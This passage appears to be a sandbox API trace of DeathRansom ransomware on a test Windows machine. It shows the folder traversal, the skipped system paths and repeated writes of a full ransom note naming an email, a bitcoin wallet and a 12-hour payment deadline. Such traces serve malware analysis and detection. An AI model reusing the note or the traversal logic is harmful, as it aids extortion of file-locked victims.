hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0075.686] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0075.686] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0075.686] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0075.686] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0075.686] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.686] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt") returned 68 [0075.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.687] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.688] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.688] CloseHandle (hObject=0x7b4) returned 1 [0075.689] GetProcessHeap () returned 0x4f10000 [0075.689] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cc1070 | out: hHeap=0x4f10000) returned 1 [0075.689] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0075.689] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 56 [0075.689] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0075.689] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0075.689] StrStrW (lpFirst="windows live", lpSrch="programdata") returned 0x0 [0075.689] StrStrW (lpFirst="windows live", lpSrch="$recycle.bin") returned 0x0 [0075.689] StrStrW (lpFirst="windows live", lpSrch="program files") returned 0x0 [0075.689] StrStrW (lpFirst="windows live", lpSrch="windows") returned="windows live" [0075.689] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="windows live", cAlternateFileName="WINDOW~1")) returned 0 [0075.689] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.689] wnsprintfW (in: pszDest=0x8c80048, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\read_me.txt") returned 55 [0075.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.689] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.689] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.690] CloseHandle (hObject=0x7a0) returned 1 [0075.690] GetProcessHeap () returned 0x4f10000 [0075.690] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c80048 | out: hHeap=0x4f10000) returned 1 [0075.690] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Links", cAlternateFileName="")) returned 1 [0075.691] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 39 [0075.691] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0075.691] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0075.691] StrStrW (lpFirst="links", lpSrch="programdata") returned 0x0 [0075.691] StrStrW (lpFirst="links", lpSrch="$recycle.bin") returned 0x0 [0075.691] StrStrW (lpFirst="links", lpSrch="program files") returned 0x0 [0075.691] StrStrW (lpFirst="links", lpSrch="windows") returned 0x0 [0075.691] StrStrW (lpFirst="links", lpSrch="all users") returned 0x0 [0075.691] StrStrW (lpFirst="links", lpSrch="appdata") returned 0x0 [0075.691] GetProcessHeap () returned 0x4f10000 [0075.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c80048 [0075.691] lstrcpyW (in: lpString1=0x8c80048, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0075.691] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 65 [0075.691] QueueUserWorkItem (Function=0x40a710, Context=0x8c80048, Flags=0x0) returned 1 [0075.691] GetProcessHeap () returned 0x4f10000 [0075.691] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cc1070 [0075.691] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0075.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.691] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.") returned 41 [0075.691] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.691] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.691] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\..") returned 42 [0075.691] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.691] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.692] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0075.692] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0075.692] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0075.692] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0075.692] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0075.692] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0075.692] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0075.692] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0075.692] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.692] wnsprintfW (in: pszDest=0x8cc1070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt") returned 51 [0075.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.692] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.692] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.693] CloseHandle (hObject=0x7a0) returned 1 [0075.693] GetProcessHeap () returned 0x4f10000 [0075.693] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cc1070 | out: hHeap=0x4f10000) returned 1 [0075.693] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0075.693] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned 48 [0075.693] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0075.693] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0075.693] StrStrW (lpFirst="local settings", lpSrch="programdata") returned 0x0 [0075.693] StrStrW (lpFirst="local settings", lpSrch="$recycle.bin") returned 0x0 [0075.694] StrStrW (lpFirst="local settings", lpSrch="program files") returned 0x0 [0075.694] StrStrW (lpFirst="local settings", lpSrch="windows") returned 0x0 [0075.694] StrStrW (lpFirst="local settings", lpSrch="all users") returned 0x0 [0075.694] StrStrW (lpFirst="local settings", lpSrch="appdata") returned 0x0 [0075.694] GetProcessHeap () returned 0x4f10000 [0075.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cc1070 [0075.694] lstrcpyW (in: lpString1=0x8cc1070, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0075.694] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 66 [0075.694] QueueUserWorkItem (Function=0x40a710, Context=0x8cc1070, Flags=0x0) returned 1 [0075.694] GetProcessHeap () returned 0x4f10000 [0075.694] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cd1078 [0075.695] wnsprintfW (in: pszDest=0x8cd1078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0075.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="\x07")) returned 0xffffffff [0075.695] wnsprintfW (in: pszDest=0x8cd1078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt") returned 60 [0075.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.696] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 